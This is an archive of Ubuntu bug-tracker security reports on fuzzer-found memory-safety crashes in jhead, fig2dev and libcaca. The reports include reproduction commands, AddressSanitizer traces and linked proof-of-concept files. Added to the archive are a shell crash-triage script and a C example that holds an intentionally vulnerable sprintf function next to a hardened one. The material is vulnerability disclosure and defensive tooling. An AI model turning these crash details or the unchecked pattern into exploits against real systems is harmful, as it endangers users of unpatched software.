[Bug 1929145] [NEW] heap-buffer-overflow of exif.c in function Put16u

2021-05-20 Thread xiao huang
*** This bug is a security vulnerability ***

Public security bug reported:

Hello Ubuntu Security Team

I used the AFL fuzzer to test jhead and found an overflow vulnerability. I
reported the issue upstream:

- https://github.com/Matthias-Wandel/jhead/issues/36

info:
Ubuntu 20.04 LTS
```
$ sudo apt search jhead
Sorting... Done
Full Text Search... Done
jhead/focal 1:3.04-1 amd64
  manipulate the non-image part of Exif compliant JPEG files

```

Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0


Source code jhead version 3.06 commit 78057ab115e7fe68ba18869f97240cba58b9e996

Thanks

** Affects: jhead (Ubuntu)
 Importance: Undecided
 Status: New


** Tags: security

** Attachment added: "poc"
   https://bugs.launchpad.net/bugs/1929145/+attachment/5499133/+files/jhead_poc.zip

** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1929145

Title:
  heap-buffer-overflow of exif.c in function Put16u

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/jhead/+bug/1929145/+subscriptions

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs

[Bug 1926673] Re: Null pointer of fig2dev of gensvg.c in function svg_arrows

2021-05-10 Thread xiao huang
Can you apply for a CVE for me?

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1926673

Title:
  Null pointer of fig2dev of gensvg.c in function svg_arrows

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/fig2dev/+bug/1926673/+subscriptions

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs

[Bug 1926676] [NEW] global-buffer-overflow of fig2dev of gensvg.c in function arrow_path

2021-04-29 Thread xiao huang
*** This bug is a security vulnerability ***

Public security bug reported:

Hi
I found an overflow error.

issues: https://sourceforge.net/p/mcj/tickets/115/
commit: 
https://sourceforge.net/p/mcj/fig2dev/ci/8c0917994e49110004a6632d0a66ea19501ad39d/

System info:
Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
fig2dev Version 3.2.8a

Verification steps:
1.Get the source code of fig2dev
2.Compile the fig2dev

```bash
$ cd fig2dev-3.2.8a
$ ./configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address"
$ make
```

3.run fig2dev
```bash
$ ./fig2dev -L svg fig2dev_crash_arrow_path
```

asan info (fig2dev's SVG output to stdout is stripped in the archive; only these fragments of its header survived: http://www.w3.org/2000/svg, xmlns:xlink="http://www.w3.org/1999/xlink", width="205pt" height="117pt", viewBox="-1795 -376 3416 1946"):

```
=================================================================
==3290613==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00f71218 at pc 0x00589130 bp 0x7ffe395b8990 sp 0x7ffe395b8988
READ of size 4 at 0x00f71218 thread T0
    #0 0x58912f in arrow_path /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:1082:40
    #1 0x5856af in svg_arrows /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:1174:2
    #2 0x586e30 in gensvg_arc /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c
    #3 0x4d0847 in gendev_objects /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev.c:1008:6
    #4 0x4d0847 in main /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev.c:485:11
    #5 0x7f25970a30b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #6 0x41c71d in _start (/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev+0x41c71d)

0x00f71218 is located 8 bytes to the left of global variable 'fpoints' defined in 'gensvg.c:1130:18' (0xf71220) of size 400
0x00f71218 is located 52 bytes to the right of global variable 'bnclippoints' defined in 'gensvg.c:1129:41' (0xf711e0) of size 4
SUMMARY: AddressSanitizer: global-buffer-overflow /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:1082:40 in arrow_path
Shadow bytes around the buggy address:
  0x801e61f0: f9 f9 f9 f9 01 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9
  0x801e6200: f9 f9 f9 f9 01 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9
  0x801e6210: f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9
  0x801e6220: f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9
  0x801e6230: f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9
=>0x801e6240: f9 f9 f9[f9]00 00 00 00 00 00 00 00 00 00 00 00
  0x801e6250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x801e6260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x801e6270: 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x801e6280: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
  0x801e6290: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==3290613==ABORTING
```

** Affects: xfig (Ubuntu)
 Importance: Undecided
 Status: New


** Tags: security

** Attachment added: "fig2dev_crash_arrow_path"
   https://bugs.launchpad.net/bugs/1926676/+attachment/5493453/+files/fig2dev_crash_arrow_path

** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1926676

Title:
  global-buffer-overflow of fig2dev of gensvg.c in function arrow_path

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/xfig/+bug/1926676/+subscriptions

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
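Every report in this thread was produced the same way: build with -fsanitize=address, run one PoC, read the ASan output. The script below is an added example and is not part of the reporter's messages or of fig2dev. It runs a set of PoC files through an ASan-instrumented binary and reduces each report to a "<bug type>@<first application frame>" key, so that duplicate crashes (a common outcome of AFL runs like these) can be bucketed before filing. The ASAN_OPTIONS values are standard ASan runtime flags; the report snippets in the comments are constructed from the reports in this thread.

```shell
#!/bin/sh
# Added example: a small triage helper for ASan crash files like the fig2dev
# PoCs in this thread. Not part of the bug reports or of fig2dev.
# Assumptions: the target is built with -fsanitize=address as in the reports;
# ASAN_OPTIONS uses standard ASan runtime flags.

# Bug type from the SUMMARY line, e.g. "global-buffer-overflow" or "SEGV".
asan_type() {
    sed -n 's/^SUMMARY: AddressSanitizer: \([^ ]*\) .*/\1/p' | head -n 1
}

# Function named at the end of the SUMMARY line. This may be a libc/libasan
# function such as vsprintf, as in the read_objects report, which is why the
# top application frame below is preferred as the bucket key.
asan_summary_func() {
    sed -n 's/^SUMMARY: AddressSanitizer: [^ ]* .* in \([^ ]*\)$/\1/p' | head -n 1
}

# First stack frame outside libasan/libc: the application function that
# actually triggered the bug (read_objects rather than vsprintf).
asan_top_frame() {
    grep -E '^ *#[0-9]+ 0x[0-9a-f]+ in ' | grep -Ev 'libasan|libc\.so|__libc_start_main' \
        | sed -E 's/^ *#[0-9]+ 0x[0-9a-f]+ in ([^ ]+).*/\1/' | head -n 1
}

# Reduce an ASan report on stdin to "<type>@<function>"; prints nothing if the
# input is not an ASan report.
asan_bucket() {
    report=$(cat)
    t=$(printf '%s\n' "$report" | asan_type)
    [ -n "$t" ] || return 0
    f=$(printf '%s\n' "$report" | asan_top_frame)
    [ -n "$f" ] || f=$(printf '%s\n' "$report" | asan_summary_func)
    printf '%s@%s\n' "$t" "$f"
}

# run_poc POC CMD...: run CMD with POC appended, capture stderr (where ASan
# writes its report), print "<bucket> POC" or "clean POC".
run_poc() {
    poc=$1; shift
    out=$(ASAN_OPTIONS=abort_on_error=0:detect_leaks=0 "$@" "$poc" 2>&1 >/dev/null) || true
    b=$(printf '%s\n' "$out" | asan_bucket)
    printf '%s %s\n' "${b:-clean}" "$poc"
}

# Command-line use: PoC files first, then "--", then the command to run, e.g.
#   sh asan_triage.sh fig2dev_crash_arrow_path fig2dev_box_crash -- ./fig2dev -L svg
# Sorted output groups identical buckets together.
if [ $# -gt 0 ]; then
    pocs=
    while [ $# -gt 0 ] && [ "$1" != "--" ]; do pocs="$pocs $1"; shift; done
    [ $# -gt 0 ] && shift
    for p in $pocs; do run_poc "$p" "$@"; done | sort
fi
```

The bucket key deliberately uses the first frame outside libasan/libc rather than the SUMMARY line: for the read_objects crash below, SUMMARY names vsprintf, which would lump every sprintf overflow in the program into one bucket. PoC file names containing spaces are not handled by the command-line loop.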

[Bug 1926677] [NEW] global-buffer-overflow of fig2dev of fig2dev/read.c in function read_objects

2021-04-29 Thread xiao huang
*** This bug is a security vulnerability ***

Public security bug reported:

Hi
I found a crash.

issues: https://sourceforge.net/p/mcj/tickets/116/
commit:https://sourceforge.net/p/mcj/fig2dev/ci/6827c09d2d6491cb2ae3ac7196439ff3aa791fd9/

System info:
Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
fig2dev Version 3.2.8a

Verification steps:
1.Get the source code of fig2dev
2.Compile the fig2dev

```bash
$ cd fig2dev-3.2.8a
$ ./configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address"
$ make
```

3.run fig2dev
```bash
$ ./fig2dev -L box fig2dev_box_crash
```

asan info

```
Invalid color definition at line 11:0#U75 0 6750 #1 -1 4 -1 -1 0.000 0  0 1 0  -1 0 0,5, setting to black (#0).
Invalid color definition at line 12: 0 i, setting to black (#0).
=================================================================
==2147685==ERROR: AddressSanitizer: global-buffer-overflow on address 0x5583735f1b08 at pc 0x7f195e0bc715 bp 0x7ffd510f0020 sp 0x7ffd510ef7b0
WRITE of size 14 at 0x5583735f1b08 thread T0
    #0 0x7f195e0bc714 in vsprintf (/lib/x86_64-linux-gnu/libasan.so.5+0x9e714)
    #1 0x7f195e0bcbce in sprintf (/lib/x86_64-linux-gnu/libasan.so.5+0x9ebce)
    #2 0x558373381445 in read_objects /home/hh/target/fuzzer/xfig/fig2dev-3.2.8a/fig2dev/read.c:505
    #3 0x558373381445 in readfp_fig /home/hh/target/fuzzer/xfig/fig2dev-3.2.8a/fig2dev/read.c:152
    #4 0x5583733824c3 in read_fig /home/hh/target/fuzzer/xfig/fig2dev-3.2.8a/fig2dev/read.c:124
    #5 0x55837334b320 in main /home/hh/target/fuzzer/xfig/fig2dev-3.2.8a/fig2dev/fig2dev.c:424
    #6 0x7f195dce80b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    #7 0x55837334d26d in _start (/home/hh/target/fuzzer/xfig/fig2dev-3.2.8a/fig2dev/fig2dev+0x7026d)

0x5583735f1b08 is located 56 bytes to the left of global variable 'support_i18n' defined in 'fig2dev.c:83:6' (0x5583735f1b40) of size 1
  'support_i18n' is ascii string ''
0x5583735f1b08 is located 0 bytes to the right of global variable 'gif_transparent' defined in 'fig2dev.c:85:6' (0x5583735f1b00) of size 8
SUMMARY: AddressSanitizer: global-buffer-overflow (/lib/x86_64-linux-gnu/libasan.so.5+0x9e714) in vsprintf
Shadow bytes around the buggy address:
  0x0ab0ee6b6310: 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9
  0x0ab0ee6b6320: 01 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9
  0x0ab0ee6b6330: 00 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9
  0x0ab0ee6b6340: 04 f9 f9 f9 f9 f9 f9 f9 01 f9 f9 f9 f9 f9 f9 f9
  0x0ab0ee6b6350: 04 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9
=>0x0ab0ee6b6360: 00[f9]f9 f9 f9 f9 f9 f9 01 f9 f9 f9 f9 f9 f9 f9
  0x0ab0ee6b6370: 01 f9 f9 f9 f9 f9 f9 f9 01 f9 f9 f9 f9 f9 f9 f9
  0x0ab0ee6b6380: 01 f9 f9 f9 f9 f9 f9 f9 01 f9 f9 f9 f9 f9 f9 f9
  0x0ab0ee6b6390: 01 f9 f9 f9 f9 f9 f9 f9 01 f9 f9 f9 f9 f9 f9 f9
  0x0ab0ee6b63a0: 01 f9 f9 f9 f9 f9 f9 f9 01 f9 f9 f9 f9 f9 f9 f9
  0x0ab0ee6b63b0: 01 f9 f9 f9 f9 f9 f9 f9 01 f9 f9 f9 f9 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==2147685==ABORTING
```

** Affects: xfig (Ubuntu)
 Importance: Undecided
 Status: New


** Tags: security

** Attachment added: "fig2dev_box_crash"
   https://bugs.launchpad.net/bugs/1926677/+attachment/5493454/+files/fig2dev_box_crash

** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1926677

Title:
  global-buffer-overflow of fig2dev of fig2dev/read.c in function read_objects

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/xfig/+bug/1926677/+subscriptions

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
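The report above shows vsprintf(), called from read_objects(), writing 14 bytes into the 8-byte global gif_transparent right after the parser has complained about an invalid colour definition. As an added illustration of that bug class (this is not fig2dev's code; the "#%02x%02x%02x" format string, the 8-byte destination and the function names are assumptions chosen to reproduce the sizes in the report), the program below shows why an unchecked colour component yields exactly a 14-byte write and how a range check plus snprintf() contains it:

```c
#include <stdio.h>
#include <string.h>

/* Added example, not fig2dev code. The ASan report above shows vsprintf()
 * writing 14 bytes into the 8-byte global gif_transparent from read_objects().
 * An "#rrggbb" colour needs exactly 8 bytes ("#" + 6 hex digits + NUL), but
 * "%02x" is only a minimum width: a component above 0xff prints more digits,
 * and three 16-bit components give "#" + 12 digits + NUL = 14 bytes, which is
 * the size ASan reported. The format string, the 8-byte size and the function
 * names below are assumptions chosen to reproduce those numbers. */

#define COLOR_BUF 8   /* assumed destination size (8 bytes in the ASan report) */

/* Bytes, including the NUL, that an unchecked sprintf of r,g,b would write. */
size_t color_bytes_needed(unsigned r, unsigned g, unsigned b)
{
    return (size_t)snprintf(NULL, 0, "#%02x%02x%02x", r, g, b) + 1;
}

/* Vulnerable pattern: trusts the parsed components. Any component above 0xff
 * writes past an 8-byte destination. Shown for comparison; not called below. */
int format_color_unchecked(char *out, unsigned r, unsigned g, unsigned b)
{
    return sprintf(out, "#%02x%02x%02x", r, g, b);
}

/* Hardened: reject components that do not fit one byte and never write more
 * than the destination holds. Returns 0 on success, -1 on bad input or a
 * destination that is too small (out is left as an empty string then). */
int format_color_checked(char *out, size_t outsz, unsigned r, unsigned g, unsigned b)
{
    if (r > 0xff || g > 0xff || b > 0xff)
        return -1;
    int n = snprintf(out, outsz, "#%02x%02x%02x", r, g, b);
    if (n < 0 || (size_t)n >= outsz) {
        if (outsz)
            out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Format into a COLOR_BUF-byte buffer limited to outsz bytes; 1 if the
 * hardened routine succeeded and produced expect, else 0. */
int checked_into(size_t outsz, unsigned r, unsigned g, unsigned b, const char *expect)
{
    char buf[COLOR_BUF];
    if (outsz > sizeof buf)
        return 0;
    if (format_color_checked(buf, outsz, r, g, b) != 0)
        return 0;
    return strcmp(buf, expect) == 0;
}

int main(void)
{
    printf("#123456 needs %zu bytes\n", color_bytes_needed(0x12, 0x34, 0x56));               /* 8 */
    printf("0xffff components need %zu bytes\n", color_bytes_needed(0xffff, 0xffff, 0xffff)); /* 14 */
    printf("checked, valid:        %d\n", checked_into(COLOR_BUF, 0x12, 0x34, 0x56, "#123456")); /* 1 */
    printf("checked, out of range: %d\n", checked_into(COLOR_BUF, 0x100, 0, 0, ""));           /* 0 */
    printf("checked, small buffer: %d\n", checked_into(4, 0x12, 0x34, 0x56, "#123456"));       /* 0 */
    return 0;
}
```

The range check is the real fix: the "Invalid color definition ... setting to black" messages in the report show the parser already knows the input was bad, so the components should never reach the formatter unvalidated. snprintf() is the second line of defence and turns any remaining mistake into a truncated string instead of a write into the neighbouring globals.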

[Bug 1926673] [NEW] Null pointer of fig2dev of gensvg.c in function svg_arrows

2021-04-29 Thread xiao huang
*** This bug is a security vulnerability ***

Public security bug reported:

Hi
I found a crash.

issues: https://sourceforge.net/p/mcj/tickets/114/
commit:https://sourceforge.net/p/mcj/fig2dev/ci/43cfa693284b076e5d2cc100758a34b76db65e58/

System info:
Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
fig2dev Version 3.2.8a

Verification steps:
1.Get the source code of fig2dev
2.Compile the fig2dev

```bash
$ cd fig2dev-3.2.8a
$ ./configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address"
$ make
```

3.run fig2dev
```bash
$ ./fig2dev -L svg fig2dev_crash
```

asan info (fig2dev's SVG output to stdout is stripped in the archive; only these fragments of its header survived: http://www.w3.org/2000/svg, xmlns:xlink="http://www.w3.org/1999/xlink", width="73pt" height="113pt", viewBox="-76 -376 1202 1877"):

```
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3255219==ERROR: AddressSanitizer: SEGV on unknown address 0x (pc 0x00583a3d bp 0x7ffec0773610 sp 0x7ffec0773590 T0)
==3255219==The signal is caused by a READ memory access.
==3255219==Hint: address points to the zero page.
    #0 0x583a3d in svg_arrows /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:1141:24
    #1 0x583a3d in gensvg_line /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:743:17
    #2 0x4d0847 in gendev_objects /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev.c:1008:6
    #3 0x4d0847 in main /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev.c:485:11
    #4 0x7f5e0e4f50b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #5 0x41c71d in _start (/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev+0x41c71d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:1141:24 in svg_arrows
==3255219==ABORTING
```

** Affects: xfig (Ubuntu)
 Importance: Undecided
 Assignee: xiao huang (shanzhuli)
 Status: New


** Tags: security

** Information type changed from Private Security to Public Security

** Summary changed:

-  fig2dev
+ Null pointer of fig2dev of gensvg.c in function svg_arrows

** Description changed:

  Hi
  I found an crash error.
  
  issues: https://sourceforge.net/p/mcj/tickets/114/
- 
+ 
commit:https://sourceforge.net/p/mcj/fig2dev/ci/43cfa693284b076e5d2cc100758a34b76db65e58/
  
  System info:
  Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
  fig2dev Version 3.2.8a
  
  Verification steps:
  1.Get the source code of fig2dev
  2.Compile the fig2dev
  
  ```bash
  $ cd fig2dev-3.2.8a
  $ ./configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address" 
CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address"
- $ make 
+ $ make
  ```
  
  3.run fig2dev
  ```bash
  $ ./fig2dev -L svg fig2dev_crash
  ```
  
  asan info:
  
  
  
  
  
  http://www.w3.org/2000/svg;
- xmlns:xlink="http://www.w3.org/1999/xlink;
- width="73pt" height="113pt"
- viewBox="-76 -376 1202 1877">
+ xmlns:xlink="http://www.w3.org/1999/xlink;
+ width="73pt" height="113pt"
+ viewBox="-76 -376 1202 1877">
  
  
  
  
  
  
+ stroke="#00" stroke-width="8px"/>
  
  
  
+ stroke="#ff" stroke-width="8px"/>
  
  
  
+ stroke="#ff" stroke-width="8px"/>
  
  
  
  
  
+ x="0" y="0" width="134" height="134">
  
  
  
  
  
  
  
+ stroke="#00" stroke-width="8px"/>
  
  
  
+ stroke="#00" stroke-width="8px"/>
  
  
  AddressSanitizer:DEADLYSIGNAL
  =
  ==3255219==ERROR: AddressSanitizer: SEGV on unknown address 0x 
(pc 0x00583a3d bp 0x7ffec0773610 sp 0x7ffec0773590 T0)
  ==3255219==The signal is caused by a READ memory access.
  ==3255219==Hint: address points to the zero page.
- #0 0x583a3d in svg_arrows 
/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:1141:24
- #1 0x583a3d in gensvg_line 
/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:743:17
- #2 0x4d0847 in gendev_objects 
/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev.c:1008:6
- #3 0x4d0847 in main 
/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev.c:485:11
- #4 0x7f5e0e4f50b2 in __libc_start_main 
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
- #5 0x41c71d in _start 
(/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev+0x41c71d)
+ #0 0x583a3d in svg_arrows 
/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:1141:24
+ #1 0x583a3d in gensvg_line 
/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:743:17
+ #2 0x4d0847 in gendev_objects 
/home/hh/Downloads/fig2dev-3.

[Bug 1926674] [NEW] heap-buffer-overflow of fig2dev of gensvg.c in function gensvg_text

2021-04-29 Thread xiao huang
*** This bug is a security vulnerability ***

Public security bug reported:

Hi
I found an overflow error.

issues: https://sourceforge.net/p/mcj/tickets/113/
commit:https://sourceforge.net/p/mcj/fig2dev/ci/f8ce1ff8837056b12c046f56e3b5248b2c8eeaa1/

System info:
Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
fig2dev Version 3.2.8a

Verification steps:
1.Get the source code of fig2dev
2.Compile the fig2dev

```bash
$ cd fig2dev-3.2.8a
$ ./configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address"
$ make
```

3.run fig2dev
```bash
$ ./fig2dev -L svg overflow_fig2dev_crash
```

asan info (fig2dev's SVG output to stdout is stripped in the archive; only these fragments of its header survived: http://www.w3.org/2000/svg, xmlns:xlink="http://www.w3.org/1999/xlink", width="900pt" height="3600pt", viewBox="163 0 25 100"):

```
=================================================================
==3221214==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200072 at pc 0x005888ef bp 0x7ffcc0226110 sp 0x7ffcc0226108
READ of size 1 at 0x60200072 thread T0
    #0 0x5888ee in gensvg_text /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:1006:42
    #1 0x4d0847 in gendev_objects /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev.c:1008:6
    #2 0x4d0847 in main /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev.c:485:11
    #3 0x7f03fc8940b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #4 0x41c71d in _start (/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev+0x41c71d)

0x60200072 is located 0 bytes to the right of 2-byte region [0x60200070,0x60200072)
allocated by thread T0 here:
    #0 0x494fd2 in calloc (/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev+0x494fd2)
    #1 0x4d5951 in read_textobject /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/read1_3.c:505:24
    #2 0x4d2b8b in read_1_3_objects /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/read1_3.c:126:16
    #3 0x4d666f in readfp_fig /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/read.c:154:12
    #4 0x4d6312 in read_fig /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/read.c:124:10
    #5 0x4d04cb in main /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev.c:424:12
    #6 0x7f03fc8940b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:1006:42 in gensvg_text
Shadow bytes around the buggy address:
  0x0c047fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c047fff8000: fa fa fd fa fa fa 00 04 fa fa 00 04 fa fa[02]fa
  0x0c047fff8010: fa fa 00 07 fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==3221214==ABORTING
```

** Affects: xfig (Ubuntu)
 Importance: Undecided
 Status: New


** Tags: security

** Attachment added: "overflow_fig2dev_crash"
   https://bugs.launchpad.net/bugs/1926674/+attachment/5493452/+files/overflow_fig2dev_crash

** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1926674

Title:
  heap-buffer-overflow of fig2dev of gensvg.c in function gensvg_text

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/xfig/+bug/1926674/+subscriptions

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs

[Bug 1925467] Re: stack-buffer-overflow of text.c in function _import_ansi

2021-04-22 Thread xiao huang
** Description changed:

  Hello ubuntu security team
+ 
+ issues: https://github.com/cacalabs/libcaca/issues/55
+ 
  System info:
  Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
  Fedora 33: clang 11.0.0 , gcc 10.2.1
  
  libcaca version e4968ba
  
  Verification steps:
  1.Get the source code of libcaca
  2.Compile the libcaca.so library
  
  $ cd libcaca
  $ ./bootstrap
  $ ./configure
  $ make
  or
  
  $ cd libcaca
  $ ./bootstrap
  $ ../configure CC="clang -O2 -fno-omit-frame-pointer -g 
-fsanitize=address,fuzzer-no-link  -fsanitize-coverage=bb" CXX="clang++ -O2 
-fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link  
-fsanitize-coverage=bb"
  $ make
  3.Create the poc_ansi.cc && build
  
  #include "config.h"
  #include "caca.h"
  //#include "common-image.h"
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 
  
  using namespace std;
  
  void crash(const uint8_t *Data, size_t Size) {
  
-   if(Size<8) return ;
-   size_t len=0;
-   caca_canvas_t *cv;
-   cv = caca_create_canvas(0,0);
-   caca_create_frame(cv,0);
-   caca_set_frame(cv,0);
-   caca_import_canvas_from_memory(cv,Data,Size,"ansi");
-   caca_free_canvas(cv);
-   cv=NULL;
+   if(Size<8) return ;
+   size_t len=0;
+   caca_canvas_t *cv;
+   cv = caca_create_canvas(0,0);
+   caca_create_frame(cv,0);
+   caca_set_frame(cv,0);
+   caca_import_canvas_from_memory(cv,Data,Size,"ansi");
+   caca_free_canvas(cv);
+   cv=NULL;
  
  }
  
- 
  int main(int args,char* argv[]){
  
